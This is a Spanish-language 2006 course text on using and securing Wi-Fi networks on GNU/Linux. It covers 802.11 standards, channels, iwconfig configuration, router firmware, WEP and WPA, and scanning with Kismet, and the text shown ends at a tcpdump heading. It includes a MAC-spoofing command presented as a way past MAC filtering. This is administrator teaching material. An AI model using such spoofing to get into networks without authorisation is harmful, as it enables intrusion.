Feb 27 2007
Tutorial seguridad redes wifi
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Resumen
En este curso analizaremos en profundidad la tecnología WiFi (Wireless
Fidelity), aprenderá a configurar y testear la seguridad en una instalación de redes
locales inalámbricas bajo entornos GNU/Linux.
Dirigido
Este curso esta orientado a administradores de sistemas y usuarios con experiencia previa en
GNU/Linux o Unix y avanzados en redes, que deseen ampliar sus conocimientos para aprovechar la
productividad y capacidad de gestión de redes inalámbricas.
Requisitos
Experiencia en el uso avanzado en redes sobre sistemas operativos GNU/Linux, Unix.
Licencia
Usted es libre de:
· copiar, distribuir y comunicar públicamente la obra
· hacer obras derivadas
· hacer un uso comercial de esta obra
Bajo las condiciones siguientes:
Reconocimiento. Debe reconocer los créditos de la obra de
la manera especificada por el autor o el licenciador.
· Al reutilizar o distribuir la obra, tiene que dejar bien claro los términos de la licencia de esta
obra.
· Alguna de estas condiciones puede no aplicarse si se obtiene el permiso del titular de los
derechos de autor
1
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
INDICE
1.
Aproximación a las Redes Inalámbricas.
Introducción
Estándar:
IEEE 802.11 a/b/g
Frecuencias 2.4GHz – 5GHz
Dispositivos Inalámbricos
Modos y estructura de la red:
Managed
Monitor
Ad-hoc
Master-Infraestructura
2.
Configuración (Cliente) e Instalación de Redes Inalámbricas (Access point).
Introducción.
Breve introducción a configuración de redes en GNU/Linux.
Chipset de tarjetas Inalámbricas y Puntos de acceso.
Prism, Atheros, Ralink, Ipw2200, Broadcom
Uso de Wireless-tools y configuración de cliente en GNU/Linux:
Iwconfig
Iwpriv
Iwlist
Configuración y Hack de Punto de acceso (Linksys WRT54G)
Configuración y flasheo de firmware
Unión de puntos de acceso
WDS y Bridges
3.
Seguridad encriptación en Redes Inalámbricas
Encriptación y Filtros
Túneles y encapsulamiento
4.
Detección de Redes inalámbricas, sniffers y detección de intrusos.
Herramientas de escaneo y medición de señal
Sniffers y el modo promiscuo
Detección de IP y de intrusos
5.
Comprometiendo la seguridad en Redes Inalámbricas (WEP)
Uso de la herramienta AIRCRACK y sus distintas funcionalidades.
6.
Detección de Sniffers, envenenamiento ARP y modos promiscuos.
Herramienta NAST ( detección de modo promiscuo)
Ettercap y envenenamiento ARP
7.
Configuración de clientes Windows y aplicaciones en Redes Inalámbricas.
Configuración de cliente en MS Windows XP
Aplicaciones de escaneo para windows Netstumbler
8.
Modelo de red urbana libre, comunidades Wireless.
Estructuras de la red
Filosofía
9.
Tipos de antenas y radicación.
Omnidireccionales, direccionales, panel, sectorial, multipolarizada
2
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Temario
1. A
proximación a las Redes Inalámbricas.
· Introducción
En redes y telecomunicaciones, se aplica el término inalámbrico (wireless) al tipo de
comunicación en la que no se utiliza un medio de propagación física, utilizando ondas
electromagnéticas, propagadas por el espacio sin un medio físico, como podría hacerlo un cable en
una red local cableada.
Tenemos que tener claro que una red inalámbrica es idéntica en comportamiento a una red cableada,
aunque ya hablaremos que cambia la forma de acceder a esta y la seguridad al acceso. Uno de los
principales problemas en el uso de redes inalámbricas es sin duda la seguridad que pueden o no
ofrecer contra intrusiones.
· Estándar
Para una mayor conectividad, es necesario concretar un estándar y que los fabricantes lo
acepten, no nos sirve un aparato que solo pueda conectar con aparatos de su misma marca
comercial. Los estándar WiFi (Wireless Fidelity) los ratifica el IEEE (Instituto de Ingenieros
Eléctricos y Electrónicos), a continuación vamos a ver los mas populares.
· 802.11b. Es ratificado por el IEEE el 16 de Septiembre de 1999, 802.11b es el protocolo mas
usado hoy día en redes inalámbricas . Este protocolo usa una modulación tipo espectro ensanchado
por secuencia directa en inglés Direct Sequence Spread Spectrum (DSSS) En un rango de
frecuencia entre 2.412 y 2.484GHz. Tiene un máximo ancho de banda teórico de 11Mbps, y reales
alrededor de 5Mbps.
· 802.11g. No fue finalizado hasta Junio de 2003, 802.11g lo ultimo en el mercado para redes
inalámbricas a fecha de hoy. Aunque no tiene ni tres años, este estándar es incluido en dispositivos
como PDAs y ordenadores portátiles 802.11g usa el mismo rango de frecuencias que el estándar
802.11b, pero usa una modulación llamada OFDM división de frecuencia por multiplexación
ortogonal (Orthogonal Frequency Division Multiplexing). Su máximo teórico sube hasta 54Mbps y
el real de unos 25Mbps, por supuesto, el estándar 802.11g es compatible con el estándar 802.11b,
reduciendo su velocidad.
· 802.11a. También ratificado por el IEEE el 16 de Septiembre de 1999, 802.11a usa como sistema
de modulación OFDM. El máximo ancho de banda teórico es de 54Mbps, con una transferencia real
de unos 27Mbps. 802.11a trabaja entre los rangos de frecuencias 5.745 y 5.805GHz, también entre
5.170 y 5.320GHz. Esto hace que no sea compatible con los estándares anteriormente mencionados
el 802.11b y el 802.11g. Esta porción del espectro, está menos usada que la de 2,4Ghz, seria una
ventaja ante interferencias pero los equipos que trabajan con este estándar no pueden penetrar tan
lejos como los del estándar 802.11b dado que sus ondas son más fácilmente absorbidas.
El precio de adaptadores y puntos de acceso en esta frecuencia es similar a los 802.11b/g pero no
son tan populares como estos.
3
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Como hemos visto antes las frecuencias vienen comprendidas entre 2.412 y 2.484GHz y
alrededor de 5Ghz. Estas son divididas en canales (puede variar según legislación de cada país).
Canal 01: 2.412 GHz
Canal 02: 2.417 GHz
Canal 03: 2.422 GHz
Canal 04: 2.427 GHz
Canal 05: 2.432 GHz
Canal 06: 2.437 GHz
Canal 07: 2.442 GHz
Canal 08: 2.447 GHz
Canal 09: 2.452 GHz
Canal 10: 2.457 GHz
Canal 11: 2.462 GHz
Canal 12: 2.467 GHz
Canal 13: 2.472 GHz
Canal 14: 2.484 GHz
Para cada canal es necesario un ancho de banda de unos 22 MHz para poder transmitir la
información, por lo que se produce un inevitable solapamiento de los canales próximos Si tenemos
que poner algunos puntos de acceso cercanos inevitablemente, deberíamos separarlos lo suficiente
siendo recomendable usar canales que no se solapen. 2, 7 y 12 otra posibilidad seria 3, 8 y 13 otra 4,
9 y 14 por ultimo 1, 8 y 14.
En España según la Orden CTE/630/2002 de 14 de marzo, Apéndice 1, nota UN-85, las frecuencias
2400 a 2483.5 MHz están disponibles para la interconexión de redes de área local sin hilos. Es
decir, se permiten los canales 1 al 13.
http://www.cmt.es/busca/Serv/document/Legislacion_nacional
/Basica_Telecomunicaciones/Do
minio_Publico/PDF/OR-02-03-22.pdf
En frecuencias de 5GHz los canales se agrupan de la siguiente manera.
Canal 36 : 5.18 GHz
Canal 40 : 5.2 GHz
Canal 42 : 5.21 GHz
Canal 44 : 5.22 GHz
Canal 48 : 5.24 GHz
Canal 50 : 5.25 GHz
Canal 52 : 5.26 GHz
Canal 56 : 5.28 GHz
4
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Canal 58 : 5.29 GHz
Canal 60 : 5.3 GHz
Canal 64 : 5.32 GHz
Canal 149 : 5.745 GHz
Canal 152 : 5.76 GHz
Canal 153 : 5.765 GHz
Canal 157 : 5.785 GHz
Canal 160 : 5.8 GHz
Canal 161 : 5.805 GHz
Canal 165 : 5.825 GHz
Según la CNAF (Centro Nacional de Asignación de Frecuencias) la potencia máxima para
frecuencias para el estándar 802.11a es de 1 Watio y para 802.11b/g es de 100 mW
Las tarjetas suelen estar entorno a 15 dBm (32mW) y una antena direccional de 21 dBm (125mW),
solemos perder parte de esos dBm en los conectores y cables (pigtails).
Para saber la equivalencia de mW y dBm podemos hacerlo con las siguientes expresiones
matemáticas,
P(mW) = 10[P(dBm)/10]
P(dBm)=10*log[P(mW)]
A continuación vemos representada una gráfica con las equivalencias dBm /mW.
5
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Tipos de modulaciones relevantes a los estándares 802.11a/b/g.
OFDM: Acrónimo en inglés Ortogonal Frequency Division Multiplexing. División de frecuencia
por multiplexación ortogonal, Es una técnica de modulación FDM que permite transmitir grandes
cantidades de datos digitales sobre una onda de radio. OFDM divide la señal de radio en muchas
sub-señales que son transmitidas simultáneamente hacia el receptor en diferentes frecuencias.
OFDM reduce la diafonía (efecto de cruce de líneas) durante la transmisión de la señal, OFDM se
utiliza en 802.11a WLAN, 802.16 y WIMAX
DSSS: El espectro ensanchado por secuencia directa en inglés (direct sequence spread spectrum o
DSSS), también conocido en comunicaciones móviles como DS-CDMA (acceso múltiple por
división de código en secuencia directa), es uno de los métodos de modulación en espectro
ensanchado para transmisión de señales digitales sobre ondas radiofónicas que más se utilizan.
Tanto DSSS como FHSS están denidos por la IEEE en el estándar 802.11 para redes de área local
inalámbricas WLAN.
· Dispositivos Inalámbricos
Punto de Acceso: Dispositivo por el cual pueden conectar clientes u otros puntos de acceso por
radiofrecuencia, este generalmente también ofrece servicios de red como DHCP o sistemas de
encriptación y regulación del acceso.
Cliente: Generalmente unidos a un punto de acceso, son las comúnmente llamadas tarjetas
wireless, aunque pueden ser dispositivos que soporte el modo Managed en general. Estos clientes
pueden también conectarse entre si sin necesidad de unirse mediante un ‘access point’ usando el
modo Adhoc
6
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Otros: en este grupo acotamos a los repetidores y potenciadores, generalmente no son
indispensables en la infraestructura de una red inalámbrica
· Modos y estructura de la red
Managed
Modo usado por los clientes inalámbricos de una red para conectar a un punto de acceso. Este es el
mas usado en redes domesticas, ya que es como usualmente configuramos una red pequeña tipo
Cliente-Punto de acceso.Ad-hoc
Una red “Ad Hoc” consiste en un grupo de ordenadores que se comunican cada uno directamente
con los otros a través de las señales de radio sin usar un punto de acceso. Las configuraciones “Ad
Hoc” son comunicaciones de tipo punto-a-punto. Los ordenadores de la red inalámbrica que quieren
comunicarse entre ellos necesitan configurar el mismo canal y ESSID en modo “Ad Hoc”.
Master-Infraestructura
Esta es la forma de trabajar de los puntos de acceso. Si queremos conectar nuestra tarjeta a uno de
ellos, debemos configurar nuestra tarjeta en este modo de trabajo. Sólo decir que esta forma de
funcionamiento es bastante más eficaz que AD HOC, en las que los paquetes “se lanzan al aire, con
la esperanza de que lleguen al destino..”, mientras que Infrastructure gestiona y se encarga de llevar
cada paquete a su sitio. Se nota además el incremento de velocidad con respecto a AD HOC.
2. C
onfiguración (Cliente) e Instalación de Redes Inalámbricas (Access point).
· Breve introducción a configuración de redes en GNU/Linux.
En Guadalinex (Debian) podemos configurar la red en el fichero /etc/network/interfaces
auto wlan0
# ejemplo con dhcp
iface wlan0 inet dhcp
#address 172.26.0.113
#netmask 255.255.255.0
#network 172.26.0.0
#gateway 172.26.0.1
wireless_essid Nombre_de_red
wireless_mode Managed
7
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
wireless_key s:mi_clave
wireless_rate auto
wireless_nick nick
En este ejemplo se ve como configuramos la dirección ip por DHCP.
Si queremos configurarlo desde la linea de comandos, seria con iwconfig, con el que nos
detendremos mas adelante.
· Chipset de tarjetas Inalámbricas y Puntos de acceso.
El principal inconveniente en la configuración de tarjetas inalámbricas es el soporte del chipset y las
implementaciones que este trae. Unos de los chips mas trabajados es el Prism2, trabaja a 11M
(802.11b) pero implementa desde el modo Monitor, el modo Master (punto de acceso), WDS y un
sin fin de características y aplicaciones para ser usadas con este chip determinado.
A continuación comentamos los chipset mas usados:
En el chipset Prism2/2.5/3, el driver mas completo es el HOSTAP (http://hostap.epitest.fi/)
Atheros, trabaja a 54M (802.11g) el driver para este chipset es el MADWIFI (http://madwifi.org/)
El chip Ralink (rt2×00), lo podemos configurar con los drivers de (http://rt2×00.serialmonkey.com)
El chipset de los centrino, Ipw2200 muy avanzado desde que liberaron las especificaciones,
podemos descargar los drivers en (http://ipw2200.sourceforge.net/) trabaja con el estándar 802.11g.
El chipset bcm43xx de Broadcom, ha sido uno de los drivers conseguidos por ingeniería inversa,
podemos descargarlo en (http://bcm43xx.berlios.de/)
· Uso de Wireless-tools y configuración de cliente en GNU/Linux:
El comando principal para configurar nuestra red inalámbrica es Iwconfig, con él podemos
asignar un identificativo de red (essid), fijar un canal (channel), una determinada velocidad (rate) o
cambiar a cada uno de los modos disponibles (adhoc, managed, monitor, master).
Sintaxis:
iwconfig [interface]
iwconfig interface [essid X] [nwid N] [freq F] [channel C]
[sens S] [mode M] [ap A] [nick NN]
[rate R] [rts RT] [frag FT] [txpower T]
[enc E] [key K] [power P] [retry R]
[commit]
iwconfig –help
iwconfig –version
A continuación vamos a detallar un poco cada una de las opciones para iwconfig.
8
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
essid
Nos referimos aquí al identificativo de red o ESSID, el punto de acceso nos informa
constantemente de este identificativo para así poder asociarnos añadiendo en la configuración
de nuestro cliente este identificativo.Ejemplo:
iwconfig eth0 essid any
iwconfig eth0 essid ‘My Network’
freq/channel
Con esta opción podemos fijar el canal o la frecuencia a la que queremos que trabaje el cliente
o el punto de acceso que vayamos a configurar.
Si no fijamos un canal o frecuencia en concreto escaneará automáticamente fijándose en el del
punto de acceso al que estemos asociándonos
Ejemplo :
iwconfig eth0 freq 2422000000
iwconfig eth0 freq 2.422G
iwconfig eth0 channel 3
sens
Podemos fijar la sensibilidad de la tarjeta si nos es posible, ya que si no está implementado no
podremos disponer de esta opción, podemos mirarlo con el comando iwpriv que veremos
posteriormente
Ejemplo :
iwconfig eth0 sens -80
mode
Impone el modo en el que opera el dispositivo, Dependiendo si están o no implementados
todos los modos podemos destacar. El modo Ad-Hoc (formando una red punto a punto sin
necesidad de Access Point), Managed (el mas usado para conectarnos a un Access Point,
incluyendo Roaming), Master (hacemos la función de Access Point), Repeater (Para repetir la
señal de un nodo wireless), Monitor (Con este modo no estamos asociados pero captamos
pasivamente los paquetes en la frecuencia que fijemos), y finalmente Auto .
Ejemplo :
iwconfig eth0 mode Managed
iwconfig eth0 mode Ad-Hoc
ap
Fuerza a asociarnos a un punto de acceso en concreto, muy útil cuando tenemos dos puntos de
acceso con el mismo identificativo y solo queremos asociarnos a uno determinado aunque no
tengamos tan buena señal como con el otro.
Podemos fijar por dirección MAC.
Ejemplo :
iwconfig eth0 ap 00:60:1D:01:23:45
iwconfig eth0 ap any
iwconfig eth0 ap off
rate/bit[rate]
Muy útil fijar una determinada velocidad, para mejorar el enlace, a mas ‘rate’, mas
fluctuaciones de señal tendremos si no es totalmente estable el enlace.
9
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Ejemplo :
iwconfig eth0 rate 11M
iwconfig eth0 rate auto
iwconfig eth0 rate 5.5M auto
key/enc[ryption]
La clave podemos asignarla de forma hexadecimal XXXX-XXXX-XXXX-XXXX o XXXXXXXX.
o en ASCII teniendo. Teniendo para 64bits (48b) de encriptación 10 dígitos y para 128bits
(104b) 26 dígitos. Para ASCII key serian 5 y 13 respectivamente.
Si desactivamos el parámetro con off deshabilitamos la criptografía.
Ejemplo :
iwconfig eth0 key 0123-4567-89
iwconfig eth0 key [3] 0123-4567-89
iwconfig eth0 key s:password [2]
iwconfig eth0 key [2]
iwconfig eth0 key open
iwconfig eth0 key off
iwconfig eth0 key restricted [3] 0123456789
iwconfig eth0 key 01-23 key 45-67 [4] key [4]
txpower
Con esta opción podemos limitar o subir la potencia, se ve condicionada por los drivers y por
el dispositivo.
Ejemplo :
iwconfig eth0 txpower 15
iwconfig eth0 txpower 30mW
iwconfig eth0 txpower auto
iwconfig eth0 txpower off
El comando Iwpriv lo usamos para ver las características de nuestra tarjeta y lo que está
implementado, aquí podremos ver si soporta modo monitor, master …
sintaxis:
iwpriv [interface]
iwpriv interface private-command [private-parameters]
iwpriv interface private-command [I] [private-parameters]
iwpriv interface –all
iwpriv interface roam {on,off}
iwpriv interface port {ad-hoc,managed,N}
Ejemplo de iwpriv de una tarjeta con chipset Prism2 y driver HOSTAP
BASH# iwpriv wlan0
wlan0 Available private ioctl :
monitor (8BE4) : set 1 int & get 0
readmif (8BE3) : set 1 byte & get 1 byte
writemif (8BE2) : set 2 byte & get 0
reset (8BE6) : set 1 int & get 0
10
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
inquire (8BE8) : set 1 int & get 0
set_rid_word (8BEE) : set 2 int & get 0
maccmd (8BF0) : set 1 int & get 0
wds_add (8BEA) : set 1 addr & get 0
wds_del (8BEC) : set 1 addr & get 0
addmac (8BF2) : set 1 addr & get 0
delmac (8BF4) : set 1 addr & get 0
kickmac (8BF6) : set 1 addr & get 0
prism2_param (8BE0) : set 2 int & get 0
getprism2_param (8BE1) : set 1 int & get 1 int
txratectrl (0002) : set 1 int & get 0
gettxratectrl (0002) : set 0 & get 1 int
beacon_int (0003) : set 1 int & get 0
getbeacon_int (0003) : set 0 & get 1 int
pseudo_ibss (0004) : set 1 int & get 0
getpseudo_ibss (0004) : set 0 & get 1 int
alc (0005) : set 1 int & get 0
getalc (0005) : set 0 & get 1 int
dump (0007) : set 1 int & get 0
getdump (0007) : set 0 & get 1 int
other_ap_policy (0008) : set 1 int & get 0
getother_ap_pol (0008) : set 0 & get 1 int
max_inactivity (0009) : set 1 int & get 0
getmax_inactivi (0009) : set 0 & get 1 int
bridge_packets (000A) : set 1 int & get 0
getbridge_packe (000A) : set 0 & get 1 int
dtim_period (000B) : set 1 int & get 0
getdtim_period (000B) : set 0 & get 1 int
nullfunc_ack (000C) : set 1 int & get 0
getnullfunc_ack (000C) : set 0 & get 1 int
max_wds (000D) : set 1 int & get 0
getmax_wds (000D) : set 0 & get 1 int
autom_ap_wds (000E) : set 1 int & get 0
getautom_ap_wds (000E) : set 0 & get 1 int
ap_auth_algs (000F) : set 1 int & get 0
getap_auth_algs (000F) : set 0 & get 1 int
allow_fcserr (0010) : set 1 int & get 0
getallow_fcserr (0010) : set 0 & get 1 int
host_encrypt (0011) : set 1 int & get 0
gethost_encrypt (0011) : set 0 & get 1 int
host_decrypt (0012) : set 1 int & get 0
gethost_decrypt (0012) : set 0 & get 1 int
busmaster_rx (0013) : set 1 int & get 0
getbusmaster_rx (0013) : set 0 & get 1 int
busmaster_tx (0014) : set 1 int & get 0
getbusmaster_tx (0014) : set 0 & get 1 int
host_roaming (0015) : set 1 int & get 0
gethost_roaming (0015) : set 0 & get 1 int
bcrx_sta_key (0016) : set 1 int & get 0
getbcrx_sta_key (0016) : set 0 & get 1 int
ieee_802_1x (0017) : set 1 int & get 0
getieee_802_1x (0017) : set 0 & get 1 int
antsel_tx (0018) : set 1 int & get 0
getantsel_tx (0018) : set 0 & get 1 int
antsel_rx (0019) : set 1 int & get 0
getantsel_rx (0019) : set 0 & get 1 int
monitor_type (001A) : set 1 int & get 0
getmonitor_type (001A) : set 0 & get 1 int
wds_type (001B) : set 1 int & get 0
11
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
getwds_type (001B) : set 0 & get 1 int
hostscan (001C) : set 1 int & get 0
gethostscan (001C) : set 0 & get 1 int
ap_scan (001D) : set 1 int & get 0
getap_scan (001D) : set 0 & get 1 int
enh_sec (001E) : set 1 int & get 0
getenh_sec (001E) : set 0 & get 1 int
basic_rates (0020) : set 1 int & get 0
getbasic_rates (0020) : set 0 & get 1 int
oper_rates (0021) : set 1 int & get 0
getoper_rates (0021) : set 0 & get 1 int
hostapd (0022) : set 1 int & get 0
gethostapd (0022) : set 0 & get 1 int
hostapd_sta (0023) : set 1 int & get 0
gethostapd_sta (0023) : set 0 & get 1 int
wpa (0024) : set 1 int & get 0
getwpa (0024) : set 0 & get 1 int
privacy_invoked (0025) : set 1 int & get 0
getprivacy_invo (0025) : set 0 & get 1 int
tkip_countermea (0026) : set 1 int & get 0
gettkip_counter (0026) : set 0 & get 1 int
drop_unencrypte (0027) : set 1 int & get 0
getdrop_unencry (0027) : set 0 & get 1 int
scan_channels (0028) : set 1 int & get 0
getscan_channel (0028) : set 0 & get 1 int
El comando Iwlist se usa para mostrar información sobre puntos de acceso a nuestro alcance y
para ver los canales, la encriptación …
Para usarlo solo tenemoss que poner el comando iwlist el interfaz wireless y la opción.
Usage: iwlist [interface] scanning
[interface] frequency
[interface] channel
[interface] bitrate
[interface] rate
[interface] encryption
[interface] key
[interface] power
[interface] txpower
[interface] retry
[interface] ap
[interface] accesspoints
[interface] peers
[interface] event
12
seguridad-13_1.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
BASH# iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 – Address: 00:14:BF:B2:4A:A0
ESSID:”algo”
Mode:Master
Encryption key:on
Channel:6
Quality:18/92 Signal level=-82 dBm Noise
level=-100 dBm
Cell 02 – Address: 00:60:B3:12:4F:52
ESSID:”Curso-Wireless”
Mode:Master
Encryption key:on
Channel:11
Quality=17/92 Signal level=-83 dBm Noise
level:-100 dBm
· Configuración y Hack de Punto de acceso (Linksys WRT54GL)
Configuración y flasheo de firmware
El WRT54G es un router inalámbrico muy popular fabricado por
Linksys . El dispositivo permite compartir conexiones a Internet entre
varios ordenadores mediante enlaces Ethernet 802.3 y 802.11g
inalámbricas. El modelo WRT54GS es prácticamente idéntico excepto por
el aumento de memoria RAM y la incorporación de la tecnología
SpeedBoost.
El WRT54G es único entre los dispositivos de consumo doméstico debido a que los desarrolladores
de Linksys tuvieron que liberar el código fuente del firmware del router para cumplir con las
obligaciones de la GNU GPL. Este hecho permite a los entusiastas de la programación modificar el
firmware para añadir o cambiar funcionalidades del dispositivo. Existen varios proyectos de
desarrollo que proveen versiones mejoradas del firmware para el WRT54G.
Unos de los firmwares mas usados son:
DD-WRT (http://www.dd-wrt.com/)
OpenWRT (http://openwrt.org/)
Sveasoft (http://www.sveasoft.com/)
13
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Para flashear el firmware, solo tenemos que descargar una de las versiones comentadas
anteriormente y en el menú vía web del aparato cargar el firmware nuevo.
· Unión de puntos de acceso
WDS y Bridges
WDS es un acrónimo inglés que significa Sistema de Distribución Inalámbrico (Wireless
Distribution System). El WDS permite la interconexión de puntos de acceso de manera inalámbrica.
Esto se describe en el IEEE 802.11.
Con WDS, un punto de acceso puede funcionar solo como punto de acceso, bien como puente con
otro punto de acceso, o ambas funciones.
De esta manera es posible crear una gran red inalámbrica dado que que cada punto de acceso se
conecta a cualquier otro punto de acceso disponible (que use WDS) y a cada punto de acceso se
pueden conectar (de forma cableada o inalámbrica) la cantidad máxima que soporte el aparato
(típicamente 256 equipos).
Se requiere que todos los equipos usen el mismo canal de radio (frecuencia) y si usan cifrado WEP
compartan las llaves de la clave.
Los SSID de los puntos de acceso pueden ser diferentes.
3. S
eguridad encriptación en Redes Inalámbricas
· Encriptación
WEP
Acrónimo de Wired Equivalency Privacy es sistema de cifrado incluido en el estándar 802.11
como protocolo para redes Wireless que permite encriptar la información que se transmite.
Proporciona encriptación a nivel 2. Está basado en el algoritmo de encriptación RC4, y utiliza
claves de 64bits, de 128bits o de 256 bits. Es INSEGURO debido a su arquitectura, por lo que el
aumentar los tamaños de las claves de encriptación sólo aumentará el tiempo necesario para
romperlo.
14
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
WPA
WPA (Wi-Fi Protected Access – Acceso Protegido Wi-Fi) es un sistema para asegurar redes
inalámbricas (WIFI), creado para corregir la seguridad del sistema previo, WEP (Wired Equivalent
Privacy – Privacidad Equivalente a Cableado); los investigadores han encontrado varias debilidades
en WEP (tal como un ataque estadístico que permite recuperar la clave WEP). WPA implementa la
mayoría del estándar IEEE 802.11i, y fue creado como una medida intermedia para ocupar el lugar
de WEP mientras 802.11i era preparado. WPA fue creado por “The Wi-Fi Alliance”.
WPA fue diseñado para utilizar un servidor de autenticación (normalmente un servidor RADIUS),
que distribuye claves diferentes a cada usuario (a través del protocolo 802.1x ); sin embargo,
también se puede utilizar en un modo menos seguro de clave pre-compartida (PSK- Pre-Shared
Key). La información es cifrada utilizando el algoritmo RC4, con una clave de 128 bits y un vector
de inicialización de 48 bits.
Una de las mejoras sobre WEP es dada por el Protocolo de Integridad de Clave Temporal (TKIP -
Temporal Key Integrity Protocol), que cambia claves dinámicamente a medida que el sistema es
utilizado. Cuando esto se combina con un vector de inicialización (IV) mucho mas grande, evita los
ataques de recuperación de clave (ataques estadísticos) a los que es susceptible WEP.
· Filtros
MAC
En redes de computadoras Media Access Control address (dirección de Control de Acceso al
Medio en español) cuyo acrónimo es MAC, es un identificador físico -un número, único en el
mundo, de 48 bits (6 bytes) – almacenado en fábrica dentro de una tarjeta de red o una interface
usada para asignar globalmente direcciones únicas en algunos modelos OSI (capa 2) y en la capa
física del conjunto de protocolos de internet. Los primeros 3 bytes (24 bits) de las direcciones MAC
son asignadas por el IEEE y los otros 3 bytes los determina el fabricante.
Es decir, si tenemos esta MAC, 00:60:B3:25:1B:C9, los primeros 3 pares corresponden a la marca
del fabricante, en este caso ZCOM (00:60:B3) y los siguientes 3 pares al número del producto para
que sea única la dirección (25:1B:C9).
El método de filtrado por dirección MAC es muy usual incluso en grandes empresas, la dirección
MAC es única pero se puede falsear fácilmente tanto en windows como en GNU/Linux.
BASH# ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX
Siendo XX:XX:XX:XX:XX:XX la mac a cambiar, también disponemos de aplicaciones especificas
para el cambio automático de la MAC como macchanger
IP
En una Red inalámbrica lo primero que haremos es deshabilitar el servicio DHCP ( asignación
de ip automática), y posteriormente poner un rango de ip raro para así desorientar al intruso, pues
bien esta medida así como la de filtrar o limitar ciertas ips para el uso de la red es totalmente
inservible o inútil a ataques.
15
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Veremos como estas medidas son fácilmente pasadas por alguien con poca experiencia pero con las
herramientas adecuadas como Netdiscover o algún sniffer como tcpdump o ethereal.
· Túneles y encapsulamiento
VPN (Virtual Private Network)
La RPV es una tecnología de red que permite una extensión de la red local sobre una red
pública o no controlada, como por ejemplo Internet.
El ejemplo más común es la posibilidad de conectar dos o más sucursales de una empresa utilizando
como vínculo Internet, permitir a los miembros del equipo de soporte técnico la conexión desde su
casa al centro de cómputo, o que un usuario pueda acceder a su equipo doméstico desde un sitio
remoto, como por ejemplo un hotel. Todo esto utilizando la infraestructura de Internet.
Para hacerlo posible de manera segura es necesario proveer los medios para garantizar la
autenticación, integridad y confidencialidad de toda la comunicación:
- Autenticación y autorización: ¿Quién está del otro lado? Usuario/equipo y qué nivel de
acceso debe tener.
- Integridad: La garantía de que los datos enviados no han sido alterados.
- Confidencialidad: Dado que los datos viajan a través de un medio potencialmente hostil
como Internet, los mismos son susceptibles de interceptación, por lo que es fundamental el
cifrado de los mismos. De este modo, la información no debe poder ser interpretada por
nadie más que los destinatarios de la misma.
Túnel SSH
En el túnel SSH (Secure Shell) lo que obligamos es a que pase un determinado puerto o
protocolo dentro del protocolo SSH encriptado y seguro.
Podemos encapsular cualquier acción o aplicación que se tenga que ejecutar en un servidor remoto
como por ejemplo VNC (Virtual Network Computing) para control remoto del escritorio o leer el
correo desde una conexión segura.
Un ejemplo de uso de túnel SSH para el VNC seria el que se detalla a continuación.
BASH$ ssh -L 5901:localhost:5901 root@192.168.0.12
Portal cautivo
Un portal cautivo es un programa o máquina de una red informática que vigila el tráfico HTTP
y fuerza a los usuarios a pasar por una página especial si quieren navegar por Internet de forma
normal. A veces esto se hace para pedir una autenticación válida, o para informar de las condiciones
de uso de un servicio wireless (que es donde más se encuentran).
16
seguridad-17_1.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Enlaces a los principales o mas conocidos portales cautivos por software.
http://nocat.net/
http://www.chillispot.org/
http://www.portless.net/menu/ewrt/ embebido en el WRT54G
http://dev.wifidog.org/ embebido en el WRT54G
4. D
etección de Redes inalámbricas, sniffers y detección de intrusos.
· Herramientas de escaneo y medición de señal
Kismet (http://www.kismetwireless.net/)
Kismet es una herramienta de escaneo de redes inalámbricas, que aprovecha el modo
monitor de la tarjeta para detectar puntos de acceso o clientes que no estén demasiado alejados
(según antena y potencia).
En la captura anterior podemos ver una serie de columnas, en las que distinguimos el essid o
identificativo de la red, el canal, si está encriptada la red o el canal en la que se encuentra entre
otras.
17
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Los colores también son identificativos de si esta o no encriptada o si tiene los valores por defecto.
Los datos son guardados en formato XML.
En la captura anterior vemos un detalle de una red con essid ‘algo’ nos muestra numerosos datos
como la mac del punto de acceso, si es a 11M (802.11b) o a 54M (802.11g), el número de paquetes,
número de Beacons …
18
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Podemos ver las estadísticas de todas las redes, el porcentaje usado tanto en redes encriptadas o no
y los distintos canales.
Wavemon (http://www.janmorgenstern.de/projects-software.html)
Wavemon nos mide la potencia de señal que tiene nuestro enlace wireless, así como la calidad,
ruido … una aplicación muy útil para probar enlaces y afinarlos tanto en cortas como en largas
distancias.
19
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· Sniffers y el modo promiscuo
Tcpdump (http://www.tcpdump.org/)
